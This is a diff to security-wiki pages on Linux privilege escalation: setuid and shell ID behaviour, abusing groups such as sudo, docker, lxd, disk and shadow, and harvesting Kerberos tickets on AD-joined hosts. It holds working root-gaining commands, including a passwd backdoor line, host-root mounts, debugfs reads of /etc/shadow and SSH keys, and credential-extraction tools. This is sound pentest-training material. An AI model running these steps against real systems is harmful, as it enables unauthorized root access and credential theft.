+- **Behavior**: As `execl` is an `exec`-family call, it operates similarly to `execve` but in the context of a new child process.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
+- **Documentation**: Further insights can be obtained from the [`system` man page](https://man7.org/linux/man-pages/man3/system.3.html).<sup>[[6]](#references)</sup>
 
 #### **Behavior of `bash` and `sh` with SUID**
 
 - **`bash`**:
-  - Has a `-p` option influencing how `euid` and `ruid` are treated.
-  - Without `-p`, `bash` sets `euid` to `ruid` if they initially differ.
-  - With `-p`, the initial `euid` is preserved.
-  - More details can be found on the [`bash` man page](https://linux.die.net/man/1/bash).
+  - Has a `-p` option influencing how `euid` and `ruid` are treated.<sup>[[7]](#references)</sup>
+  - Without `-p`, `bash` sets `euid` to `ruid` if they initially differ.<sup>[[7]](#references)</sup>
+  - With `-p`, the initial `euid` is preserved.<sup>[[7]](#references)</sup>
+  - More details can be found on the [`bash` man page](https://linux.die.net/man/1/bash).<sup>[[7]](#references)</sup>
 - **`sh`**:
-  - Does not possess a mechanism similar to `-p` in `bash`.
-  - The behavior concerning user IDs is not explicitly mentioned, except under the `-i` option, emphasizing the preservation of `euid` and `ruid` equality.
-  - Additional information is available on the [`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html).
+  - POSIX `sh` does not define a Bash-style `-p` privilege-preservation option.<sup>[[8]](#references)</sup>
+  - Its POSIX option list includes `-i`, which selects interactive mode and may be rejected when the real and effective IDs differ.<sup>[[8]](#references)</sup>
+  - Additional information is available on the [`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html).<sup>[[8]](#references)</sup>
 
 These mechanisms, distinct in their operation, offer a versatile range of options for executing and transitioning between programs, with specific nuances in how user IDs are managed and preserved.
 
 ### Testing User ID Behaviors in Executions
 
-Examples taken from https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, check it for further information<sup>[[1]](#references)</sup>
+Examples taken from https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, check it for further information.<sup>[[1]](#references)</sup>
 
 #### Case 1: Using `setuid` with `system`
 
@@ -91,9 +89,9 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconf
 **Analysis:**
 
 - `ruid` and `euid` start as 99 (nobody) and 1000 (frank) respectively.
-- `setuid` aligns both to 1000.
+- In this unprivileged context, `setuid(1000)` leaves `ruid` at 99 and `euid` at 1000.<sup>[[1]](#references)</sup>
 - `system` executes `/bin/bash -c id` due to the symlink from sh to bash.
-- `bash`, without `-p`, adjusts `euid` to match `ruid`, resulting in both being 99 (nobody).
+- `bash`, without `-p`, adjusts `euid` to match `ruid`, resulting in both being 99 (nobody).<sup>[[1]](#references)</sup>
 
 #### Case 2: Using setreuid with system
 
@@ -127,7 +125,7 @@ uid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:uncon
 **Analysis:**
 
 - `setreuid` sets both ruid and euid to 1000.
-- `system` invokes bash, which maintains the user IDs due to their equality, effectively operating as frank.
+- `system` invokes bash, which maintains the user IDs due to their equality, effectively operating as frank.<sup>[[1]](#references)</sup>
 
 #### Case 3: Using setuid with execve
 
@@ -154,7 +152,7 @@ uid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_
 
 **Analysis:**
 
-- `ruid` remains 99, but euid is set to 1000, in line with setuid's effect.
+- `ruid` remains 99, but euid is set to 1000, in line with setuid's effect.<sup>[[1]](#references)</sup>
 
 **C Code Example 2 (Calling Bash):**
 
@@ -180,7 +178,7 @@ uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconf
 
 **Analysis:**
 
-- Although `euid` is set to 1000 by `setuid`, `bash` resets euid to `ruid` (99) due to the absence of `-p`.
+- Although `euid` is set to 1000 by `setuid`, `bash` resets euid to `ruid` (99) due to the absence of `-p`.<sup>[[1]](#references)</sup>
 
 **C Code Example 3 (Using bash -p):**
 
@@ -202,7 +200,7 @@ int main(void) {
 ```bash
 bash-4.2$ $ ./e
 bash-4.2$ $ id
-uid=99(nobody) gid=99(nobody) euid=100
+uid=99(nobody) gid=99(nobody) euid=1000(frank)
 ```
 
 ## References
@@ -212,5 +210,8 @@ uid=99(nobody) gid=99(nobody) euid=100
 - [3] [man7.org - setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html)
 - [4] [man7.org - setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html)
 - [5] [man7.org - execve man page](https://man7.org/linux/man-pages/man2/execve.2.html)
+- [6] [man7.org - system man page](https://man7.org/linux/man-pages/man3/system.3.html)
+- [7] [man7.org - bash man page](https://man7.org/linux/man-pages/man1/bash.1.html)
+- [8] [man7.org - POSIX sh man page](https://man7.org/linux/man-pages/man1/sh.1p.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/user-information/interesting-groups-linux-pe/README.md
+++ b/src/linux-hardening/user-information/interesting-groups-linux-pe/README.md
@@ -1,12 +1,10 @@
 # Interesting Groups - Linux Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Sudo/Admin Groups
 
 ### **PE - Method 1**
 
-**Sometimes**, **by default (or because some software needs it)** inside the **/etc/sudoers** file you can find some of these lines:
+**Sometimes**, a system's **/etc/sudoers** policy (or a file included from it) contains entries such as:<sup>[[3]](#references)</sup>
 
 ```bash
 # Allow members of group sudo to execute any command
@@ -16,7 +14,7 @@
 %admin 	ALL=(ALL:ALL) ALL
 ```
 
-This means that **any user that belongs to the group sudo or admin can execute anything as sudo**.
+This means that any user matched by either entry may run any command as any target user through `sudo` (subject to the rest of the policy).<sup>[[3]](#references)</sup>
 
 If this is the case, to **become root you can just execute**:
 
@@ -32,19 +30,20 @@ Find all suid binaries and check if there is the binary **Pkexec**:
 find / -perm -4000 2>/dev/null
 ```
 
-If you find that the binary **pkexec is a SUID binary** and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`.\
-This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with:
+If **pkexec is a SUID binary**, it can execute a program as another user only when polkit authorizes the requested action; the SUID bit alone does not guarantee root. Check the installed policy and the target session's authorization instead of assuming membership in **sudo** or **admin** is sufficient.<sup>[[4]](#references)[[5]](#references)</sup>
+
+On distributions that still use the older Local Authority backend, inspect its group rules with:
 
 ```bash
 cat /etc/polkit-1/localauthority.conf.d/*
 ```
 
-There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear.
+The relevant group names and defaults vary by distribution; a group is useful here only if the local policy names it.<sup>[[5]](#references)</sup>
 
 To **become root you can execute**:
 
 ```bash
-pkexec "/bin/sh" #You will be prompted for your user password
+pkexec "/bin/sh" #Authentication is required according to the local policy
 ```
 
 If you try to execute **pkexec** and you get this **error**:
@@ -55,7 +54,7 @@ polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freed
 Error executing command as another user: Not authorized
 ```
 
-**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**:<sup>[[1]](#references)</sup>
+On an SSH session without a registered authentication agent, `pkexec` may fail with this error even when the policy would otherwise allow the action; polkit documents `pkttyagent` as a text authentication agent for non-desktop sessions. The exact behavior is version- and distribution-dependent, so verify the local policy and agent setup. One workaround reported for affected NixOS versions uses **2 different SSH sessions**.<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 ```bash:session1
 echo $$ #Step1: Get current PID
@@ -70,13 +69,13 @@ pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
 
 ## Wheel Group
 
-**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line:
+Sometimes a sudoers policy may also contain this entry:
 
 ```
 %wheel	ALL=(ALL:ALL) ALL
 ```
 
-This means that **any user that belongs to the group wheel can execute anything as sudo**.
+This means that any user matched by the entry may run any command as any target user through `sudo` (subject to the rest of the policy).<sup>[[3]](#references)</sup>
 
 If this is the case, to **become root you can just execute**:
 
@@ -86,7 +85,7 @@ sudo su
 
 ## Shadow Group
 
-Users from the **group shadow** can **read** the **/etc/shadow** file:
+On systems whose permissions grant it, users in the **shadow** group can **read** **/etc/shadow**; verify the actual mode and ACLs on the target:<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```
 -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
@@ -96,15 +95,15 @@ So, read the file and try to **crack some hashes**.
 
 Quick lock-state nuance when triaging hashes:
 - Entries with `!` or `*` are generally non-interactive for password logins.
-- `!hash` usually means a password was set and then locked.
-- `*` usually means no valid password hash was ever set.
-This is useful for account classification even when direct login is blocked.
+- `!hash` means the password was locked; the remaining characters represent the password field before it was locked.
+- A field containing `*` is not a valid `crypt(3)` hash and prevents UNIX-password login; do not infer from it whether a password was previously set.
+This is useful for account classification even when direct login is blocked.<sup>[[6]](#references)</sup>
 
 ## Staff Group
 
-**staff**: Allows users to add local modifications to the system (`/usr/local`) without needing root privileges (note that executables in `/usr/local/bin` are in the PATH variable of any user, and they may "override" the executables in `/bin` and `/usr/bin` with the same name). Compare with group "adm", which is more related to monitoring/security. [\[source\]](https://wiki.debian.org/SystemGroups)<sup>[[2]](#references)</sup>
+**staff**: Allows users to add local modifications to the system (`/usr/local`) without needing root privileges (note that executables in `/usr/local/bin` are in the PATH variable of any user, and they may "override" the executables in `/bin` and `/usr/bin` with the same name). Compare with group "adm", which is more related to monitoring/security.<sup>[[2]](#references)[[7]](#references)</sup>
 
-In debian distributions, `$PATH` variable show that `/usr/local/` will be run as the highest priority, whether you are a privileged user or not.
+On Debian configurations where `/usr/local/bin` precedes `/usr/bin` in `PATH` (as in the examples below), an unqualified command resolves to the `/usr/local/bin` copy first; confirm the effective `PATH` on the target.
 
 ```bash
 $ echo $PATH
@@ -114,9 +113,9 @@ $ echo $PATH
 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 ```
 
-If we can hijack some programs in `/usr/local`, we can easy to get root.
+If a privileged process resolves an unqualified command through a writable `/usr/local/bin`, replacing that command can execute with the process's privileges; confirm the actual path and trigger before testing.
 
-Hijack `run-parts` program is a way to easy to get root, because most of program will run a `run-parts` like (crontab, when ssh login).
+On Ubuntu systems, `pam_motd` runs executable scripts via `run-parts --lsbsysinit` as root at login; cron jobs may also use `run-parts`, but this is distribution- and configuration-specific.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 $ cat /etc/crontab | grep run-parts
@@ -126,7 +125,7 @@ $ cat /etc/crontab | grep run-parts
 52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
 ```
 
-or When a new ssh session login.
+On a new SSH login, `pspy` can help confirm whether this path is actually invoked on the target; it can observe process command lines without root.<sup>[[10]](#references)[[12]](#references)</sup>
 
 ```bash
 $ pspy64
@@ -164,9 +163,9 @@ $ /bin/bash -p
 
 ## Disk Group
 
-This privilege is almost **equivalent to root access** as you can access all the data inside of the machine.
+Membership in the **disk** group may grant raw access to block devices and is often **close to root access**; Debian describes it as mostly equivalent to root, but verify the actual device permissions and storage layout on the target.<sup>[[7]](#references)</sup>
 
-Files:`/dev/sd[a-z][1-9]`
+Common device paths include `/dev/sd*`, but NVMe and other storage layouts use different names.
 
 ```bash
 df -h #Find where "/" is mounted
@@ -177,18 +176,23 @@ debugfs: cat /root/.ssh/id_rsa
 debugfs: cat /etc/shadow
 ```
 
-Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do:
+`debugfs` operates on ext2/ext3/ext4 filesystems; paths such as `/root` and `/etc/shadow` above are files inside the opened filesystem, while the second argument to `dump` is an output path on the native filesystem.<sup>[[8]](#references)</sup> For example, this extracts `/tmp/asd1.txt` from the opened filesystem to `/tmp/asd2.txt` on the native filesystem:
 
 ```bash
-debugfs -w /dev/sda1
+debugfs /dev/sda1
 debugfs:  dump /tmp/asd1.txt /tmp/asd2.txt
 ```
 
-However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error.
+The `-w` option opens the filesystem read-write, and the `write` command copies a native file into the opened filesystem. Avoid using it on a mounted live filesystem because direct edits can corrupt the filesystem; work from an offline image when possible.<sup>[[8]](#references)</sup>
+
+```bash
+debugfs -w /dev/sda1
+debugfs:  write /tmp/asd1.txt /tmp/asd2.txt
+```
 
 ## Video Group
 
-Using the command `w` you can find **who is logged on the system** and it will show an output like the following one:
+Using the command `w` you can find **who is logged on the system** and it will show an output like the following one.<sup>[[20]](#references)</sup>
 
 ```bash
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
@@ -196,26 +200,26 @@ yossi    tty1                      22:16    5:13m  0.05s  0.04s -bash
 moshe    pts/1    10.10.14.44      02:53   24:07   0.06s  0.06s /bin/bash
 ```
 
-The **tty1** means that the user **yossi is logged physically** to a terminal on the machine.
+The **tty1** entry identifies the first Linux virtual console; it does not by itself prove that a user is physically present at the machine, especially in containers or other environments.<sup>[[21]](#references)</sup>
 
-The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size`
+On systems exposing a readable framebuffer device, membership in the **video** group may grant access to that device. The Linux framebuffer interface documents `/dev/fb0` as a readable memory device that can be copied for a screen snapshot; the `/sys/class/graphics/fb0/virtual_size` path is available only where that fbdev sysfs attribute is present, so check the target first.<sup>[[7]](#references)[[9]](#references)</sup>
 
 ```bash
 cat /dev/fb0 > /tmp/screen.raw
 cat /sys/class/graphics/fb0/virtual_size
 ```
 
-To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**:
+If the installed **GIMP** version exposes a raw-data importer, open **`screen.raw`** with that importer; support and controls vary by version and plug-in.<sup>[[22]](#references)</sup>
 
 ![Disk Group - Video Group: To open the raw image you can use GIMP , select the screen.raw file and select as file type Raw image data](<../../../images/image (463).png>)
 
-Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen):
+Set the image Width and Height to match the framebuffer geometry; try the available pixel formats/Image Types until the output is legible.<sup>[[9]](#references)</sup>
 
 ![Disk Group - Video Group: Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen)](<../../../images/image (317).png>)
 
 ## Root Group
 
-It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges...
+Membership in the **root** group does not provide root's UID, but group-writable files owned by `root` can still be interesting when privileged services or libraries consume them. Verify the file's actual permissions and how it is used before treating it as a privilege-escalation path.
 
 **Check which files root members can modify**:
 
@@ -225,7 +229,7 @@ find / -group root -perm -g=w 2>/dev/null
 
 ## Docker Group
 
-You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
+Membership in the `docker` group grants root-level access to the Docker daemon on standard rootful installs. Because bind mounts are read-write by default, a user who can control that daemon can mount the host's `/` into a container and alter host files; this effectively gives root on the host.<sup>[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 docker image #Get images from the docker service
@@ -236,7 +240,7 @@ docker run -it --rm -v /:/mnt <imagename> chroot /mnt bash
 echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/passwd
 
 #Ifyou just want filesystem and network access you can startthe following container:
-docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chroot /mnt bashbash
+docker run --rm -it --pid=host --net=host --privileged -v /:/mnt <imagename> chroot /mnt bash
 ```
 
 Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here:
@@ -264,11 +268,13 @@ https://fosterelli.co/privilege-escalation-via-docker.html
 ## Adm Group
 
 Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\
-Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**.
+Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**.<sup>[[7]](#references)</sup>
 
 ## Backup / Operator / lp / Mail groups
 
-These groups are often **credential-discovery** vectors rather than direct root vectors:
+These groups have service- and distribution-specific meanings. Debian documents `backup` for delegated backup/restore, `lp` for printer daemons, and `mail` for `/var/mail`, so check local permissions before treating membership as a privilege path.<sup>[[7]](#references)</sup>
+
+They are often **credential-discovery** vectors rather than direct root vectors:
 - **backup**: may expose archives with configs, keys, DB dumps, or tokens.
 - **operator**: platform-specific operational access that can leak sensitive runtime data.
 - **lp**: print queues/spools can contain document contents.
@@ -278,12 +284,31 @@ Treat membership here as a high-value data exposure finding and pivot through pa
 
 ## Auth group
 
-Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used.\
-These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
+On OpenBSD, when S/Key is configured, `/etc/skey` is owned by `root:auth` and access to its records requires group `auth`; YubiKey records are stored in `/var/db/yubikey`.<sup>[[16]](#references)[[17]](#references)</sup> A vulnerable OpenBSD 6.6 configuration with S/Key or YubiKey enabled allowed local users with `auth` privileges to become root; Qualys documents the prerequisite and exploit chain, and the linked PoC implements it.<sup>[[18]](#references)[[19]](#references)</sup>
 
 ## References
 
 - [1] [pkexec/pkttyagent authentication without a GUI session (NixOS issue #18012)](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)
 - [2] [SystemGroups - Debian Wiki](https://wiki.debian.org/SystemGroups)
+- [3] [sudoers(5) — sudo — Debian Manpages](https://manpages.debian.org/bookworm/sudo/sudoers.5.en.html)
+- [4] [pkexec — polkit Reference Manual](https://polkit.pages.freedesktop.org/polkit/pkexec.1.html)
+- [5] [polkit — polkit Reference Manual](https://polkit.pages.freedesktop.org/polkit/polkit.8.html)
+- [6] [shadow(5) — Linux manual page](https://man7.org/linux/man-pages/man5/shadow.5.html)
+- [7] [Securing Debian Manual](https://www.debian.org/doc/manuals/securing-debian-manual/securing-debian-manual.en.pdf)
+- [8] [debugfs(8) — Linux manual page](https://www.man7.org/linux/man-pages/man8/debugfs.8.html)
+- [9] [The Frame Buffer Device — The Linux Kernel documentation](https://docs.kernel.org/fb/framebuffer.html)
+- [10] [update-motd(5) — Ubuntu Manpages](https://manpages.ubuntu.com/manpages/resolute/man5/update-motd.5.html)
+- [11] [run-parts(8) — Debian Manpages](https://manpages.debian.org/unstable/debianutils/run-parts.8.en.html)
+- [12] [pspy — unprivileged Linux process snooping](https://github.com/DominicBreuker/pspy)
+- [13] [Docker Engine security](https://docs.docker.com/engine/security/)
+- [14] [Manage Docker as a non-root user](https://docs.docker.com/engine/install/linux-postinstall)
+- [15] [Running containers — Docker Docs](https://docs.docker.com/engine/containers/run/)
+- [16] [skey(5) — OpenBSD manual pages](https://man.openbsd.org/skey.5)
+- [17] [login_yubikey(8) — OpenBSD manual pages](https://man.openbsd.org/login_yubikey.8)
+- [18] [Authentication vulnerabilities in OpenBSD — Qualys Security Advisory](https://www.openwall.com/lists/oss-security/2019/12/04/5)
+- [19] [openbsd-authroot — local exploit PoC](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
+- [20] [w(1) — Linux manual page](https://man7.org/linux/man-pages/man1/w.1.html)
+- [21] [Linux allocated devices (4.x+ version)](https://docs.kernel.org/6.16/admin-guide/devices.html)
+- [22] [Image Import and Export — GIMP Documentation](https://docs.gimp.org/3.0/en/gimp-prefs-import-export.html)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/user-information/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/src/linux-hardening/user-information/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -1,18 +1,16 @@
 # lxd/lxc Group - Privilege escalation
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root
+Membership in the host's LXD management group (normally _**lxd**_) can provide a path to root by allowing full control of the daemon.<sup>[[1]](#references)</sup>
 
 ## Exploiting without internet
 
 ### Method 1
 
-You can download an alpine image to use with lxd from a trusted repository.
-Canonical publishes daily builds in their site: [https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/](https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/)
-Just grab both **lxd.tar.xz** and **rootfs.squashfs** from the newest build. (Directory name is the date).
+You can download an Alpine image to use with LXD from a trusted repository.
+Canonical's LXD image server publishes daily builds: [https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/](https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/)
+Just grab both **lxd.tar.xz** and **rootfs.squashfs** from the newest build (the directory name is the date).<sup>[[8]](#references)</sup>
 
-Alternativelly you can install in your machine this distro builder: [https://github.com/lxc/distrobuilder](https://github.com/lxc/distrobuilder) (follow the instructions of the github):
+Alternatively, you can install distrobuilder on your machine by following the [project instructions](https://github.com/lxc/distrobuilder).<sup>[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Install requirements
@@ -37,7 +35,7 @@ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
 sudo $HOME/go/bin/distrobuilder build-incus alpine.yaml -o image.release=3.18 -o image.architecture=x86_64
 ```
 
-Upload the files **incus.tar.xz** (**lxd.tar.xz** if you downloaded from Canonical repository) and **rootfs.squashfs**, add the image to the repo and create a container:
+Upload **incus.tar.xz** (**lxd.tar.xz** if you downloaded from the Canonical image server) and **rootfs.squashfs**, then import the image and create a container.<sup>[[2]](#references)[[3]](#references)[[5]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
@@ -56,9 +54,9 @@ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=t
 
 > [!CAUTION]
 > If you find this error _**Error: No storage pool found. Please create a new storage pool**_\
-> Run **`lxd init`** and set-up all options on default. Then **repeat** the previous chunk of commands
+> Run **`lxd init`**, set up a default storage pool, then **repeat** the previous chunk of commands.<sup>[[2]](#references)</sup>
 
-Finally you can execute the container and get root:
+Finally, start the container and open a root shell on the host filesystem:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 lxc start privesc
@@ -68,7 +66,7 @@ lxc exec privesc /bin/sh
 
 ### Method 2
 
-Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
+Build an Alpine image and start it with the flag `security.privileged=true`, which maps container root to host root; mounting `/` then exposes the host filesystem inside the container.<sup>[[1]](#references)[[7]](#references)[[9]](#references)</sup>
 
 ```bash
 # build a simple alpine image
@@ -89,5 +87,17 @@ lxc init myimage mycontainer -c security.privileged=true
 # mount the /root into the image
 lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
 ```
+
+## References
+
+- [1] [How to harden security for LXD](https://canonical.com/lxd/docs/latest/howto/security_harden/)
+- [2] [LXD containers and virtual machines](https://ubuntu.com/server/docs/how-to/virtualisation/lxd/)
+- [3] [How to copy and import images](https://canonical.com/lxd/docs/latest/howto/images_copy/)
+- [4] [distrobuilder](https://github.com/lxc/distrobuilder)
+- [5] [How to build images with distrobuilder](https://github.com/lxc/distrobuilder/blob/main/doc/howto/build.md)
+- [6] [Alpine image definition](https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml)
+- [7] [lxd-alpine-builder build script](https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine)
+- [8] [LXD image server](https://images.lxd.canonical.com/)
+- [9] [Type: disk](https://canonical.com/lxd/docs/latest/reference/devices_disk/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/user-information/linux-active-directory.md
+++ b/src/linux-hardening/user-information/linux-active-directory.md
@@ -1,10 +1,8 @@
 # Linux Active Directory
 
-{{#include ../../banners/hacktricks-training.md}}
-
 A linux machine can also be present inside an Active Directory environment.
 
-A Linux machine inside an AD can **store Kerberos material locally**: user ccaches, machine/service keytabs, and SSSD-managed secrets. These artefacts can usually be reused as any other Kerberos credential. In order to read most of them you will need to be the user owner of the ticket or **root** on the machine.
+A Linux machine inside an AD can **store Kerberos material locally**: user ccaches, machine/service keytabs, and SSSD-managed secrets. These artefacts can usually be reused as any other Kerberos credential. In order to read most of them you will need to be the user owner of the ticket or **root** on the machine.<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
 ## Enumeration
 
@@ -21,7 +19,7 @@ You can also check the following page to learn **other ways to enumerate AD from
 
 ### FreeIPA
 
-FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in:
+FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes.<sup>[[14]](#references)[[15]](#references)</sup> Learn more about it in:
 
 
 {{#ref}}
@@ -30,7 +28,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director
 
 ### Domain-joined host artefacts
 
-Before touching tickets, identify **how the host was joined to AD** and **where Kerberos material is really stored**. On modern Linux hosts this is commonly handled by `realmd` + `adcli` + `sssd`, not just flat files in `/tmp`:
+Before touching tickets, identify **how the host was joined to AD** and **where Kerberos material is really stored**. On modern Linux hosts this is commonly handled by `realmd` + `adcli` + `sssd`, not just flat files in `/tmp`.<sup>[[10]](#references)</sup>
 
 ```bash
 # Is the host joined to a realm/domain?
@@ -47,7 +45,7 @@ find /var/lib/sss -maxdepth 3 \( -name '*.ldb' -o -name '.secrets.mkey' -o -name
 find /tmp /run/user -maxdepth 2 -name 'krb5cc*' -ls 2>/dev/null
 ```
 
-This quickly tells you whether the host trusts AD, whether SSSD is caching identities or tickets, and whether **machine/service keytabs** or **KCM secrets** are available for abuse.
+This quickly tells you whether the host trusts AD, whether SSSD is caching identities or tickets, and whether **machine/service keytabs** or **KCM secrets** are available for abuse.<sup>[[4]](#references)[[10]](#references)</sup>
 
 ## Playing with tickets
 
@@ -68,7 +66,7 @@ If you want the **Linux-specific ticket harvesting workflows** (`FILE`, `DIR`, `
 
 ### CCACHE ticket reuse from /tmp
 
-CCACHE files are binary formats for **storing Kerberos credentials**. `FILE:/tmp/krb5cc_%{uid}` is still common, but modern Linux deployments also use `DIR:/run/user/%{uid}/krb5cc*`, `KEYRING:persistent:%{uid}`, or `KCM:%{uid}`. Check the **`KRB5CCNAME`** environment variable and the `default_ccache_name` setting before assuming tickets live in `/tmp`.<sup>[[1]](#references)</sup>
+CCACHE files are binary formats for **storing Kerberos credentials**. `FILE:/tmp/krb5cc_%{uid}` is still common, but modern Linux deployments also use `DIR:/run/user/%{uid}/krb5cc*`, `KEYRING:persistent:%{uid}`, or `KCM:%{uid}`. Check the **`KRB5CCNAME`** environment variable and the `default_ccache_name` setting before assuming tickets live in `/tmp`.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 # Where is the current process reading credentials from?
@@ -86,7 +84,7 @@ klist
 
 ### CCACHE ticket reuse from keyring
 
-**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`.
+**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`.<sup>[[1]](#references)[[16]](#references)</sup>
 
 To configure and use this tool, the steps below are followed:
 
@@ -101,16 +99,16 @@ This procedure will attempt to inject into various sessions, indicating success 
 
 ### CCACHE ticket reuse from SSSD KCM
 
-SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
+SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.<sup>[[4]](#references)</sup>
 
-Invoking **`SSSDKCMExtractor`** with the --database and --key parameters will parse the database and **decrypt the secrets**.
+Invoking **`SSSDKCMExtractor`** with the --database and --key parameters will parse the database and **decrypt the secrets**.<sup>[[4]](#references)</sup>
 
 ```bash
 git clone https://github.com/fireeye/SSSDKCMExtractor
 python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
 ```
 
-The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus.
